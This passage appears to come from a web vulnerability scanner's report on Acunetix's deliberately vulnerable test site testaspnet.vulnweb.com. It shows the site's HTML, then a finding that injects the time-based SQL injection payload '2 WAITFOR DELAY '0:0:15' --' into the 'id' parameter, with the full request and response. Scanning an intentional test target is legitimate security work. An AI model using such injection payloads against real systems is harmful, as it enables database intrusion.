YWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFLUNvbW1lbnRzLmFzcHg/aWQ9MCBXQUlURk9SIERFTEFZICcwOjA6MTUnIC0tIGRkAgsPFgIeA3NyY2RkZGqCNHI40xOfnuofld1oJ9kAdqL+" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLx7L2OAgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIzGXSYYvdiZQqH+gTK9UrlGTJxT" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0 WAITFOR DELAY '0:0:15' -- ">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html
Method	GET
Parameter	id
Attack	2 WAITFOR DELAY '0:0:15' --
Evidence
Show / hide Request and Response
Request Header - size: 521 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2+WAITFOR+DELAY+%270%3A0%3A15%27+--+&NewsAd=ads%2Fdef.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:48:14 GMT Content-Length: 30700
Response Body - size: 30,700 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2+WAITFOR+DELAY+'0%3a0%3a15'+--+&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIG